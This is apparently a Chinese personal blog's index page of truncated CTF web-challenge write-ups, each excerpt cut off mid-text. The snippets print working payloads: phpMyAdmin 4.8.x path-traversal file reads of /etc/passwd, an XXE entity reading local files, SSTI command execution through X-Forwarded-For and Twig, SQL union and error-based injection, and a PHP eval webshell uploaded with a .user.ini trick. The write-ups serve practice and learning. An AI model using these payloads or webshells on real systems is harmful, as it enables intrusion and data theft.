shannidawang的博客

phpmyadmin任意文件读取进入phpmyadminphpmyadmin4.8.0-4.8.1存在文件包含漏洞直接上payload读取passwd文件?target=db_datadict.php%253f/../../../../../../../../etc/passwd读取成功，尝试读取flag文件/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag...

直接购买flag 然后抓包解码我们把钱改大一点解码session

提示我们使用admin账户登录，并且存在cookie/monster两个账户

参考链接源码<?phpinclude 'config.php'; // FLAG is defined in config.phpif (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you are thinking, but I won't let you read it :)");}if (isset($_GET['source'])) { highligh

查看FLAG 提示我们关注ip测试{7*7}查看下目录cat /flagX-Forwarded-For:{system("cat /flag")}

XML讲解抓包构造PL<?xml version="1.0" encoding="utf-8"?><!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///flag"> ]><user><username>&admin;</username><password>123456</password></user>...

我每天都会叮嘱自己学英语（我们可以注意到 xff看了别人的wp ssti和smarty查看下根目录下文件{system('ls \')}发现cat好像被过滤了{show_source('/flag')}

sad 我的御剑怎么又扫不出来文件泄露 index.php.swp源码<?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$

查看源码 function enc(code){ hash = hex_md5(code); return hash; } function validate(){ var code = document.getElementById("vcode").value; if (code != ""){ if(hex_md5(code) == "0cd4da0223c0b280829dc3ea458d655c"){

先注册 我先尝试admin 显示已经被注册过了登陆后 进行一个申请然后我申请了一个information_schema的广告(or也是这个回显查询列数order by被过滤了 可以使用group by1'/**/group/**/by/**/22,'1构造-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22手动探测列数，这里探测到有22列，回显位为2和3查表-1

昨天写了一个差不多的题 online tool这个题目就比较直观了属于是源码<?phprequire('settings.php');set_time_limit(0);if (isset($_POST['host'])): if (!defined('WEB_SCANS')) { die('Web scans disabled'); } $host = $_POST['host']; if(stripos($host,'php')!==false){ d

考点RCE PHP源码<?phpif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];}if(!isset($_GET['host'])) { highlight_file(__FILE__);} else { $host = $_GET['host']; $host = escapeshella

考点：反序列化查看源码源码<?php#error_reporting(0);class HelloPhp{ public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){ $a = $this-&

查看源联想到 robots.txt很好 很有精神查看响应头给爷整不会了 为啥乱码了中文 但可以勉强阅读（bushi<?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highlight_file(__file__);//level 1if (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) <

试到最后一个项目时回显如下查看源码根据提示结合回显的报错告诉了我们只能使用一个字符所以我没要找到大于1377的字符联想到UnicodeUnicode字符集查找

.git泄露得到两个重要文件flag.php<?php$flag = file_get_contents('/flag');index.php<?phpinclude 'flag.php';//包含了flag.php$yds = "dog";$is = "cat";$handsome = 'yds';#变量覆盖漏洞foreach($_POST as $x => $y){ $$x = $y;}foreach($_GET as $x =>

好喜欢这个题 可爱可爱查看hint在flag页面 进行测试其中{{7*7}}在Twig中返回49，在Jinja2中返回的是7777777，由此判断出为Twig模版注入因为提示了cookie，所以使用BurpSuite抓取数据包：进行测试详解模板注入漏洞{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}说明是对的payload：{{_self.env.register

家人萌 我又来抄（bushi 写wp了发现这段呢很像base64解码2次3535352e706e67base16解码就是左上角的图片但是 把关注点落在编码方式上 将index.php编码编码结果为：TmprMlpUWTBOalUzT0RKbE56QTJPRGN3在源码中发现 base64解码<?phperror_reporting(E_ALL || ~ E_NOTICE);header('content-type:text/html;charset=utf-8');$

为什么最近没写博客呢因为kail被我搞崩了 一直在搞 现在是重装了 这就是没有拍摄快照习惯的下场还有呢就是我都阿帕奇 port80被禁了 现在属于是还没解决上传一句话木马

第一章 web入门]常见的搜集呢用御剑扫了一下 笑死 啥也没扫出来了用dirsearch扫1、gedit备份文件，格式为filename~，比如index.php~2、vim备份文件，格式为.filename.swp或者*.swo或者*.swn，比如.index.php.swp3、robots.txt[第一章 web入门]粗心的小李题目中提示是Git测试，此时我们可以使用GitHack脚本对其进行测试。进入githack 目录下打开index.html[第一章 web入门]SQL

尝试登入 发现一个search.php先base32解码 得到的结果进行base64解码select * from user where username = '$name'通过测试呢 可以猜测用户名为admin测试字段数1' order by 3#只有三个字段联合注入1' union select 1,'admin',3经测试 admin在第二列当查询的数据不存在时，联合查询就会构造一个虚拟的数据输入admin，密码为md5(123456)，代入查询时MySQL里面就会生成a

确实是一整个不知所措了尝试了一下双写 不行那就基本上是报错注入了使用extractvalue和updatexml进行报错注入extractvalue()extractvalue() :对XML文档进行查询的函数语法：extractvalue(目标xml文档，xml路径)第一个参数 : 第一个参数可以传入目标xml文档第二个参数： xml中的位置是可操作的地方，xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式，如果我们写入其他格式，就会报错，并且会返回我们写入的非法格式.

看wp说是有备份文件robots.txt泄露源码<?phpclass UserInfo{ public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->name = $name; $this->age = (int)$age; $

先测试一下得到提示"select * from 'admin' where password=' ".md5($pass,true)." ' "输入：ffifdyop为什么是ffifdyop$a = $GET['a'];$b = $_GET['b'];if($a != $b && md5($a) == md5($b)){ // wow, glzjin wants a girl friend.可以用结果等于0exxxxxx的字符串，也可以使用数组a[]=1&a

查看源码源码上表名了password的要求password=404a抓包把这个user=0改成1然后按要求post一个password=404a&money=100000000这波属于搞人心态 给爷整无语了接下来呢应该提示我money过长两种方法1.科学计数法 1e82.strcmp函数绕过特性int strcmp ( string $str1 , string $str2 )参数 str1第一个字符串。str2第二个字符串。如果 str1 小于 str2 返回 &lt

可恶啊 今天差点没做题先随便上传一个 提示文件要图片改一下后缀名文件内容为：GIF89a<script language="php">eval($_POST['shell']);</script> 然后我们构造一个.user.ini文件GIF89aauto_prepend_file=test.jpg把这个也上传连接蚁剑连接的url要加上dir这段http://4e81767b-49fa-4900-ae74-e1d5e68039ab.node4.buuo

知识点：双写绕过先进行测试?username=admin&password=123'union select 1?#You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1?'' at line 1根据回显说明union select被检测到了猜测使用replace函

文件上传 一句话木马先写一个test.phtml文件GIF89a<script language="php">eval($_POST['shell']);</script> 上传 抓包更改文件类型使用蚁剑连接 猜测路径为/upload/test.phtml密码就是test中写入的shell在根目录下发现flag文件...

查看源代码我们访问这个页面，显示上说这个页面必须来自"https://www.Sycsecret.com"那就抓包无语了 他总说我申请错误（拳头硬了但是可以用hackbarhackbar ????

查看源码 提示看calc.php<?phperror_reporting(0);if(!isset($_GET['num'])){ show_source(__FILE__);}else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^']; foreach ($blacklist as $b